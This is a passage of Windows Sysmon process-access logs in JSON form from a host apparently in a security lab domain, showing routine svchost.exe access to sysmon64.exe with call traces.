(rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:17.224","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1859,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:17.224\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:17.224","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1860,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:17.224\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:17.224","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1861,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:17.224\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:17.224","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1862,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:17.224\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:17.224","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1863,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:17.224\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:17.224","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1864,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:17.224\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:17.224","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1865,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:17.224\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:17.224","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1866,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:17.224\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 